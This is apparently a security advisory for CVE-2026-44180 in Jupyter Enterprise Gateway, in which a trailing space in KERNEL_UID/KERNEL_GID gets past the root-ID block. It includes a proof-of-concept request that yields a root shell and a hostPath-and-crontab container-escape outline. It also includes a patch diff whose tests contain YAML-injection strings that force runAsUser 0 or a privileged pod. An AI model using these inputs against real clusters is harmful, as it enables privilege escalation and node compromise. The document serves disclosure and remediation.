VYPR
Critical severity 9.8 · NVD Advisory · Published Jun 3, 2026 · Updated Jun 3, 2026

Jupyter Enterprise Gateway: ContainerProcessProxy._enforce_prohibited_ids Bypass

CVE-2026-44180

Description

Summary

Jupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root). This can be bypassed. It is possible to launch kernels with a prohibited UID and/or GID by using a specially crafted KERNEL_UID or KERNEL_GID value.

The feature is described in the documentation:

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L103-L107

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L88-L92

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/deploy-kubernetes.md?plain=1#L769

Details

The prohibited_uids and prohibited_gids values are set from the OS environment variables EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS, and default to the string 0.

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L29-L30

The checks at https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L113 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L119 look for the user-supplied KERNEL_UID / KERNEL_GID string in the prohibited_uids / prohibited_gids strings. These checks can be bypassed by including whitespace, for example the string "0 " (0 followed by a trailing space).

The user-supplied string is then used in the Kubernetes manifest at https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L35 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L38, where it is parsed as an integer in the Jinja2 template, which ignores the whitespace.
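
The mismatch between the two steps can be reproduced in plain Python. This is a minimal sketch, not the gateway's code: `PROHIBITED_UIDS`, `is_prohibited` and `effective_uid` are hypothetical names, the comma split of the default value is an assumption, and Python's built-in `int()` stands in for the integer conversion that the advisory attributes to the template.

```python
# Hypothetical stand-in for the gateway's prohibited-UID check.
# Assumption: the default "0" is split on commas into a list of strings.
PROHIBITED_UIDS = "0".split(",")


def is_prohibited(kernel_uid: str) -> bool:
    """Exact string comparison, mirroring the check described above."""
    return kernel_uid in PROHIBITED_UIDS


def effective_uid(kernel_uid: str) -> int:
    """Integer conversion; int() ignores surrounding whitespace."""
    return int(kernel_uid)


for candidate in ("0", "0 "):
    # Columns: raw value, rejected by the check?, UID after conversion
    print(repr(candidate), is_prohibited(candidate), effective_uid(candidate))
```

Under these assumptions the value `"0"` is rejected, while `"0 "` passes the string comparison and still converts to UID 0.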

PoC

How it is meant to work

Trying 0 gets denied, as expected.

xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0", "KERNEL_GID": "0"}'
HTTP/1.1 403 Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!
Content-Length: 94
Content-Type: application/json
Date: Mon, 14 Jul 2025 12:57:09 GMT
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff
{
    "reason": "Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!",
    "message": ""
}

Exploit bypassing the checks

Using 0 with a trailing space bypasses the check.

xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0 ", "KERNEL_GID": "0 "}'
HTTP/1.1 201 Created
Content-Length: 172
Content-Type: application/json
Date: Mon, 14 Jul 2025 14:15:19 GMT
Location: /api/kernels/17eee032-994f-4dd2-8ade-87169c300a40
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff
{
    "id": "17eee032-994f-4dd2-8ade-87169c300a40",
    "name": "python_kubernetes",
    "last_activity": "2025-07-14T14:15:21.468155Z",
    "execution_state": "starting",
    "connections": 0
}

The pod is successfully scheduled.

Inspecting the container we can see it is running as root:

kubectl exec -it pod/bdawg -- bash
(base) root@bdawg3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)

If we had not supplied the KERNEL_UID / KERNEL_GID the container would have been running as UID:GID 1000:100 (jovyan:users).
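
One way to close the gap demonstrated above is to normalise the value before comparing it. The following is a minimal sketch under that assumption and should not be read as the project's actual fix; `normalise_id` and `enforce_prohibited_ids` are hypothetical names introduced here for illustration.

```python
import re

# Hypothetical helper: accept only plain ASCII decimal digits.
_DECIMAL_ID = re.compile(r"[0-9]+")


def normalise_id(raw: str) -> int:
    """Return the numeric ID, rejecting whitespace, signs and other characters."""
    if not isinstance(raw, str) or _DECIMAL_ID.fullmatch(raw) is None:
        raise ValueError(f"invalid UID/GID value: {raw!r}")
    return int(raw)


def enforce_prohibited_ids(raw: str, prohibited: set[int]) -> int:
    """Compare as integers so that '0', '00' and similar spellings are all caught."""
    value = normalise_id(raw)
    if value in prohibited:
        raise PermissionError(f"ID {value} is prohibited")
    return value
```

With this approach `"0 "` is rejected as malformed before any comparison takes place, and `"00"` is rejected as prohibited because the comparison is numeric rather than textual.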

Impact

This input validation vulnerability allows Jupyter kernels to run as root. This is dangerous because it increases the attack surface and may lead to container escapes, compromising the worker node and all workloads running on it. Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. Because it is possible to specify volume mounts, one vector for a container escape is to request a read/write hostPath volume mount, use this UID/GID bypass to run as root, and then gain code execution on the underlying worker node by creating a crontab entry in the mounted host file system.

Affected are organisations running Jupyter Enterprise Gateway to host Jupyter kernels on Kubernetes clusters (which I have tested), and possibly on any other supported container orchestration system, or any system that uses the KERNEL_UID and KERNEL_GID variables with the EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS feature.

Affected products

1

Patches

5
2258a41f9840

Fix YAML injection via KERNEL_* env vars (GHSA-cfw7-6c5v-2wjq)

https://github.com/jupyter-server/enterprise_gateway · Luciano Resende · Apr 28, 2026 · Fixed in 3.3.0 · via ghsa-release-walk
7 files changed · +590 -45
  • enterprise_gateway/services/kernels/handlers.py · +13 -7 · modified
    @@ -18,6 +18,8 @@
     
     from ...mixins import CORSMixin, JSONErrorsMixin, TokenAuthorizationMixin
     
    +MAX_ENV_VALUE_LENGTH = 4096
    +
     
     class MainKernelHandler(
         TokenAuthorizationMixin, CORSMixin, JSONErrorsMixin, jupyter_server_handlers.MainKernelHandler
    @@ -66,13 +68,17 @@ async def post(self):
                 allowed_envs: list[str]
                 allowed_envs = model["env"].keys() if self.client_envs == ["*"] else self.client_envs
                 # Allow KERNEL_* args and those allowed by configuration.
    -            env.update(
    -                {
    -                    key: value
    -                    for key, value in model["env"].items()
    -                    if key.startswith("KERNEL_") or key in allowed_envs
    -                }
    -            )
    +            for key, value in model["env"].items():
    +                if key.startswith("KERNEL_") or key in allowed_envs:
    +                    if not isinstance(value, str):
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' value must be a string"
    +                        )
    +                    if len(value) > MAX_ENV_VALUE_LENGTH:
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' exceeds maximum length"
    +                        )
    +                    env[key] = value
     
                 # If kernel_headers are configured, fetch each of those and include in start request
                 kernel_headers = {}
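
The handler change above can be exercised outside Tornado with a small stand-alone function. This is a sketch rather than the handler itself: `filter_kernel_env` is a hypothetical name, and `ValueError` stands in for the HTTP 400 error raised in the diff.

```python
MAX_ENV_VALUE_LENGTH = 4096  # same limit as in the diff above


def filter_kernel_env(requested: dict, allowed_envs: list[str]) -> dict:
    """Copy KERNEL_* and explicitly allowed variables after validating each value.

    ValueError is a stand-in for the HTTP 400 error raised by the real handler.
    """
    env = {}
    for key, value in requested.items():
        if key.startswith("KERNEL_") or key in allowed_envs:
            if not isinstance(value, str):
                raise ValueError(f"Environment variable '{key}' value must be a string")
            if len(value) > MAX_ENV_VALUE_LENGTH:
                raise ValueError(f"Environment variable '{key}' exceeds maximum length")
            env[key] = value
    return env
```

These two checks constrain only the type and length of each value, so a value such as `"0 "` still passes them unchanged.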
    
  • enterprise_gateway/tests/test_yaml_injection.py · +450 -0 · added
    @@ -0,0 +1,450 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for YAML injection vulnerability fix (GHSA-cfw7-6c5v-2wjq)."""
    +
    +import os
    +import unittest
    +
    +import yaml
    +from jinja2 import Environment, FileSystemLoader, select_autoescape
    +
    +TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "kubernetes",
    +    "scripts",
    +)
    +
    +OPERATOR_TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "operators",
    +    "scripts",
    +)
    +
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +ALLOWED_K8S_KINDS = {
    +    "Pod",
    +    "Secret",
    +    "PersistentVolumeClaim",
    +    "PersistentVolume",
    +    "Service",
    +    "ConfigMap",
    +}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template."""
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
    +
    +def _build_keywords(env_overrides: dict) -> dict:
    +    """Build a keywords dict from env_overrides using the fixed parsing logic."""
    +    keywords = {}
    +    for name, value in env_overrides.items():
    +        if name.startswith("KERNEL_"):
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if isinstance(parsed, list) and all(isinstance(item, dict) for item in parsed):
    +                    keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
    +    return keywords
    +
    +
    +def _render_pod_template(keywords: dict) -> str:
    +    """Render the kernel-pod.yaml.j2 template with the yaml_safe filter."""
    +    j_env = Environment(
    +        loader=FileSystemLoader(os.path.normpath(TEMPLATE_DIR)),
    +        trim_blocks=True,
    +        lstrip_blocks=True,
    +        autoescape=select_autoescape(
    +            disabled_extensions=("j2", "yaml"),
    +            default_for_string=True,
    +            default=True,
    +        ),
    +    )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +    return j_env.get_template("/kernel-pod.yaml.j2").render(**keywords)
    +
    +
    +def _base_env() -> dict:
    +    return {
    +        "KERNEL_POD_NAME": "test-pod",
    +        "KERNEL_NAMESPACE": "default",
    +        "KERNEL_ID": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    +        "KERNEL_IMAGE": "elyra/kernel-py:3.2.3",
    +        "KERNEL_SERVICE_ACCOUNT_NAME": "default",
    +        "KERNEL_UID": "1000",
    +        "KERNEL_GID": "100",
    +    }
    +
    +
    +class TestYamlSafeStrFilter(unittest.TestCase):
    +    """Test the yaml_safe_str Jinja2 filter."""
    +
    +    def test_normal_string(self):
    +        result = yaml_safe_str("/home/jovyan")
    +        self.assertEqual(result, '"/home/jovyan"')
    +
    +    def test_string_with_quotes(self):
    +        result = yaml_safe_str('hello "world"')
    +        self.assertIn("hello", result)
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], 'hello "world"')
    +
    +    def test_string_with_newlines_escaped(self):
    +        result = yaml_safe_str("line1\nline2\nline3")
    +        self.assertNotIn("\n", result.strip('"'))
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "line1\nline2\nline3")
    +
    +    def test_document_boundary_escaped(self):
    +        result = yaml_safe_str("before\n---\nafter")
    +        parsed_docs = list(yaml.safe_load_all(f"key: {result}"))
    +        self.assertEqual(len(parsed_docs), 1)
    +        self.assertEqual(parsed_docs[0]["key"], "before\n---\nafter")
    +
    +    def test_end_of_document_marker_escaped(self):
    +        result = yaml_safe_str("before\n...\nafter")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIn("...", parsed["key"])
    +
    +    def test_none_serialized_as_yaml_null(self):
    +        result = yaml_safe_str(None)
    +        self.assertEqual(result, "null")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIsNone(parsed["key"])
    +
    +    def test_bool_serialized_as_yaml_bool(self):
    +        self.assertEqual(yaml_safe_str(True), "true")
    +        self.assertEqual(yaml_safe_str(False), "false")
    +        parsed_true = yaml.safe_load(f"key: {yaml_safe_str(True)}")
    +        parsed_false = yaml.safe_load(f"key: {yaml_safe_str(False)}")
    +        self.assertIs(parsed_true["key"], True)
    +        self.assertIs(parsed_false["key"], False)
    +
    +    def test_numeric_serialized_correctly(self):
    +        self.assertEqual(yaml_safe_str(1000), "1000")
    +        self.assertEqual(yaml_safe_str(3.14), "3.14")
    +        parsed_int = yaml.safe_load(f"key: {yaml_safe_str(1000)}")
    +        parsed_float = yaml.safe_load(f"key: {yaml_safe_str(3.14)}")
    +        self.assertEqual(parsed_int["key"], 1000)
    +        self.assertAlmostEqual(parsed_float["key"], 3.14)
    +
    +    def test_dict_rendered_as_flow_mapping(self):
    +        result = yaml_safe_str({"name": "data", "mountPath": "/data"})
    +        parsed = yaml.safe_load(f"- {result}")
    +        self.assertEqual(parsed[0]["name"], "data")
    +        self.assertEqual(parsed[0]["mountPath"], "/data")
    +
    +    def test_empty_string(self):
    +        result = yaml_safe_str("")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "")
    +
    +    def test_image_name_with_tag(self):
    +        result = yaml_safe_str("registry.example.com/org/image:v1.2.3")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "registry.example.com/org/image:v1.2.3")
    +
    +
    +class TestEnvVarParsing(unittest.TestCase):
    +    """Test that env var parsing correctly distinguishes scalar vs structured vars."""
    +
    +    def test_scalar_vars_remain_strings(self):
    +        env = {"KERNEL_IMAGE": "nginx:latest", "KERNEL_UID": "1000"}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_image"], "nginx:latest")
    +        self.assertIsInstance(keywords["kernel_image"], str)
    +        self.assertEqual(keywords["kernel_uid"], "1000")
    +        self.assertIsInstance(keywords["kernel_uid"], str)
    +
    +    def test_volume_mounts_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUME_MOUNTS": '[{"name": "data", "mountPath": "/data"}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volume_mounts"], list)
    +        self.assertEqual(keywords["kernel_volume_mounts"][0]["name"], "data")
    +
    +    def test_volumes_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUMES": '[{"name": "data", "emptyDir": {}}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volumes"], list)
    +
    +    def test_non_list_volume_rejected(self):
    +        env = {"KERNEL_VOLUME_MOUNTS": "not-a-list"}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_list_of_strings_volume_rejected(self):
    +        """List of strings (not dicts) should be rejected to prevent injection via loop items."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '["name: data\\nmountPath: /data"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_mixed_list_volume_rejected(self):
    +        """List containing both dicts and strings should be rejected."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '[{"name": "ok"}, "injected\\nstring"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_yaml_safe_load_not_applied_to_scalars(self):
    +        env = {"KERNEL_WORKING_DIR": '"injected\\nvalue"'}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_working_dir"], '"injected\\nvalue"')
    +        self.assertNotIn("\n", keywords["kernel_working_dir"])
    +
    +
    +class TestSecurityContextInjection(unittest.TestCase):
    +    """Test that securityContext injection via KERNEL_WORKING_DIR is blocked."""
    +
    +    def test_security_context_not_overridden(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = (
    +            '"/tmp\\"\\n\\nsecurityContext:\\n  runAsUser: 0\\n  runAsGroup: 0\\n  fsGroup: 100\\n"'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +
    +    def test_injection_via_kernel_image(self):
    +        env = _base_env()
    +        env["KERNEL_IMAGE"] = 'nginx"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_kernel_namespace(self):
    +        env = _base_env()
    +        env["KERNEL_NAMESPACE"] = 'default"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_volume_mounts_string_list_blocked_at_l1(self):
    +        """L1: list-of-strings in KERNEL_VOLUME_MOUNTS is rejected during parsing."""
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = (
    +            '["{name: data, mountPath: /data}\\n  securityContext:\\n    runAsUser: 0"]'
    +        )
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_injection_via_volume_mounts_blocked_at_l2(self):
    +        """L2: even if a string slips into volume_mounts, yaml_safe filter escapes it."""
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        keywords["kernel_volume_mounts"] = [
    +            "{name: data, mountPath: /data}\n  securityContext:\n    runAsUser: 0"
    +        ]
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        env["KERNEL_WORKING_DIR"] = (
    +            '/tmp\n...\n---\napiVersion: v1\nkind: Pod\nmetadata:\n'
    +            '  name: injected-pod\nspec:\n  containers:\n'
    +            '  - name: evil\n    image: nginx\n    securityContext:\n'
    +            '      privileged: true\n...\n'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        self.assertEqual(len(docs), 1, "Injected document should not create extra YAML documents")
    +        self.assertEqual(docs[0]["kind"], "Pod")
    +        self.assertEqual(docs[0]["metadata"]["name"], "test-pod")
    +
    +    def test_all_rendered_kinds_are_allowed(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        for doc in docs:
    +            self.assertIn(
    +                doc.get("kind"),
    +                ALLOWED_K8S_KINDS,
    +                f"Unexpected kind: {doc.get('kind')}",
    +            )
    +
    +    def test_duplicate_pod_kind_detected(self):
    +        """L3: if an attacker somehow injected a second Pod, document count validation catches it."""
    +        multi_pod_yaml = (
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: legit\n"
    +            "---\n"
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: evil\n"
    +        )
    +        docs = list(yaml.safe_load_all(multi_pod_yaml))
    +        kind_counts: dict[str, int] = {}
    +        for doc in docs:
    +            if doc:
    +                kind = doc.get("kind")
    +                kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +
    +        self.assertEqual(kind_counts.get("Pod"), 2)
    +        self.assertGreater(kind_counts["Pod"], 1, "Should detect duplicate Pod documents")
    +
    +
    +class TestNormalOperation(unittest.TestCase):
    +    """Test that the fix preserves normal kernel launch functionality."""
    +
    +    def test_basic_pod_renders_correctly(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        pod = docs[0]
    +        self.assertEqual(pod["kind"], "Pod")
    +        self.assertEqual(pod["metadata"]["name"], "test-pod")
    +        self.assertEqual(pod["metadata"]["namespace"], "default")
    +        self.assertEqual(pod["spec"]["containers"][0]["image"], "elyra/kernel-py:3.2.3")
    +        self.assertEqual(pod["spec"]["serviceAccountName"], "default")
    +
    +    def test_working_dir_set_correctly(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = "/home/jovyan/work"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        self.assertEqual(pod["spec"]["containers"][0]["workingDir"], "/home/jovyan/work")
    +
    +    def test_resource_limits_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_CPUS"] = "500m"
    +        env["KERNEL_MEMORY"] = "1Gi"
    +        env["KERNEL_CPUS_LIMIT"] = "1"
    +        env["KERNEL_MEMORY_LIMIT"] = "2Gi"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        resources = pod["spec"]["containers"][0]["resources"]
    +        self.assertEqual(resources["requests"]["cpu"], "500m")
    +        self.assertEqual(resources["requests"]["memory"], "1Gi")
    +        self.assertEqual(resources["limits"]["cpu"], "1")
    +        self.assertEqual(resources["limits"]["memory"], "2Gi")
    +
    +    def test_security_context_with_uid_gid(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        sc = pod["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +        self.assertEqual(sc["fsGroup"], 100)
    +
    +    def test_volume_mounts_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = '[{"name": "data-vol", "mountPath": "/data"}]'
    +        env["KERNEL_VOLUMES"] = '[{"name": "data-vol", "emptyDir": {}}]'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        mounts = pod["spec"]["containers"][0]["volumeMounts"]
    +        self.assertEqual(len(mounts), 1)
    +        self.assertEqual(mounts[0]["name"], "data-vol")
    +
    +        volumes = pod["spec"]["volumes"]
    +        self.assertEqual(len(volumes), 1)
    +        self.assertEqual(volumes[0]["name"], "data-vol")
    +
    +
    +class TestSparkOperatorTemplate(unittest.TestCase):
    +    """Test that the Spark operator template is also protected."""
    +
    +    def _render_operator_template(self, keywords: dict) -> str:
    +        j_env = Environment(
    +            loader=FileSystemLoader(os.path.normpath(OPERATOR_TEMPLATE_DIR)),
    +            trim_blocks=True,
    +            lstrip_blocks=True,
    +            autoescape=select_autoescape(
    +                disabled_extensions=("j2", "yaml"),
    +                default_for_string=True,
    +                default=True,
    +            ),
    +        )
    +        j_env.filters["yaml_safe"] = yaml_safe_str
    +        return j_env.get_template(
    +            "/sparkoperator.k8s.io-v1beta2.yaml.j2"
    +        ).render(**keywords)
    +
    +    def test_injection_via_kernel_image_blocked(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": 'nginx\nmalicious:\n  key: value',
    +            "kernel_id": "test-id",
    +            "spark_context_initialization_mode": "none",
    +            "eg_response_address": "1.2.3.4:8080",
    +            "eg_port_range": "0..0",
    +            "eg_public_key": "testkey",
    +            "kernel_service_account_name": "default",
    +            "kernel_executor_image": "elyra/kernel-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertIn("\n", doc["spec"]["image"])
    +        self.assertNotIn("malicious", doc)
    +
    +    def test_normal_spark_app_renders(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": "elyra/kernel-spark-py:3.2.3",
    +            "kernel_id": "test-id-123",
    +            "spark_context_initialization_mode": "lazy",
    +            "eg_response_address": "10.0.0.1:8080",
    +            "eg_port_range": "10000..11000",
    +            "eg_public_key": "abc123",
    +            "kernel_service_account_name": "spark-sa",
    +            "kernel_executor_image": "elyra/kernel-spark-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertEqual(doc["metadata"]["name"], "test-spark")
    +        self.assertEqual(doc["spec"]["image"], "elyra/kernel-spark-py:3.2.3")
    +        self.assertEqual(doc["spec"]["driver"]["serviceAccount"], "spark-sa")
    +
    +
    +if __name__ == "__main__":
    +    unittest.main()
    
  • etc/kernel-launchers/docker/scripts/launch_docker.py · +6 -0 · modified
    @@ -2,6 +2,7 @@
     
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -27,6 +28,11 @@ def launch_docker_kernel(
         if image_name is None:
             sys.exit("ERROR - KERNEL_IMAGE not found in environment - kernel launch terminating!")
     
    +    if not re.match(
    +        r'^[a-zA-Z0-9][a-zA-Z0-9._\-/]*(:[a-zA-Z0-9._\-]+)?(@sha256:[a-f0-9]+)?$', image_name
    +    ):
    +        sys.exit(f"ERROR - KERNEL_IMAGE contains invalid characters: {image_name}")
    +
         # Container name is composed of KERNEL_USERNAME and KERNEL_ID
         container_name = os.environ.get("KERNEL_USERNAME", "") + "-" + kernel_id
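
The behaviour of the image-name pattern added above can be checked in isolation. In this sketch the pattern is copied from the diff, while `image_name_ok` and `image_name_ok_strict` are hypothetical helper names; the strict variant is an illustration of `re.fullmatch`, not part of the patch.

```python
import re

# Pattern copied from the diff above.
IMAGE_NAME_RE = r'^[a-zA-Z0-9][a-zA-Z0-9._\-/]*(:[a-zA-Z0-9._\-]+)?(@sha256:[a-f0-9]+)?$'


def image_name_ok(image_name: str) -> bool:
    """Same call shape as the patch: re.match with ^...$ anchors."""
    return re.match(IMAGE_NAME_RE, image_name) is not None


def image_name_ok_strict(image_name: str) -> bool:
    """Hypothetical stricter variant: fullmatch must consume the whole string."""
    return re.fullmatch(IMAGE_NAME_RE, image_name) is not None


for name in ("elyra/kernel-py:3.2.3", "nginx --privileged", "nginx\n"):
    print(repr(name), image_name_ok(name), image_name_ok_strict(name))
```

In Python, `$` also matches just before a trailing newline, so `"nginx\n"` is accepted by `re.match` but rejected by `re.fullmatch`; values containing spaces are rejected by both.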
     
    
  • etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2 · +15 -15 · modified
    @@ -10,18 +10,18 @@
     apiVersion: v1
     kind: Pod
     metadata:
    -  name: "{{ kernel_pod_name }}"
    -  namespace: "{{ kernel_namespace }}"
    +  name: {{ kernel_pod_name | yaml_safe }}
    +  namespace: {{ kernel_namespace | yaml_safe }}
       labels:
    -    kernel_id: "{{ kernel_id }}"
    +    kernel_id: {{ kernel_id | yaml_safe }}
         app: enterprise-gateway
         component: kernel
         source: kernel-pod.yaml
       annotations:
         cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
     spec:
       restartPolicy: Never
    -  serviceAccountName: "{{ kernel_service_account_name }}"
    +  serviceAccountName: {{ kernel_service_account_name | yaml_safe }}
     # NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.
     # WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate
     # will result in the new kernel pod's effective group of 0 (root)! although the user will
    @@ -40,8 +40,8 @@ spec:
         fsGroup: 100
       {% endif %}
       containers:
    -  - image: "{{ kernel_image }}"
    -    name: "{{ kernel_pod_name }}"
    +  - image: {{ kernel_image | yaml_safe }}
    +    name: {{ kernel_pod_name | yaml_safe }}
         env:
     # Add any custom envs here that aren't already configured for the kernel's environment
     #    - name: MY_CUSTOM_ENV
    @@ -51,42 +51,42 @@ spec:
           {% if kernel_cpus is defined or kernel_memory is defined or kernel_gpus is defined %}
           requests:
             {% if kernel_cpus is defined %}
    -        cpu: "{{ kernel_cpus }}"
    +        cpu: {{ kernel_cpus | yaml_safe }}
             {% endif %}
             {% if kernel_memory is defined %}
    -        memory: "{{ kernel_memory }}"
    +        memory: {{ kernel_memory | yaml_safe }}
             {% endif %}
             {% if kernel_gpus is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus }}"
    +        nvidia.com/gpu: {{ kernel_gpus | yaml_safe }}
             {% endif %}
           {% endif %}
           {% if kernel_cpus_limit is defined or kernel_memory_limit is defined or kernel_gpus_limit is defined %}
           limits:
             {% if kernel_cpus_limit is defined %}
    -        cpu: "{{ kernel_cpus_limit }}"
    +        cpu: {{ kernel_cpus_limit | yaml_safe }}
             {% endif %}
             {% if kernel_memory_limit is defined %}
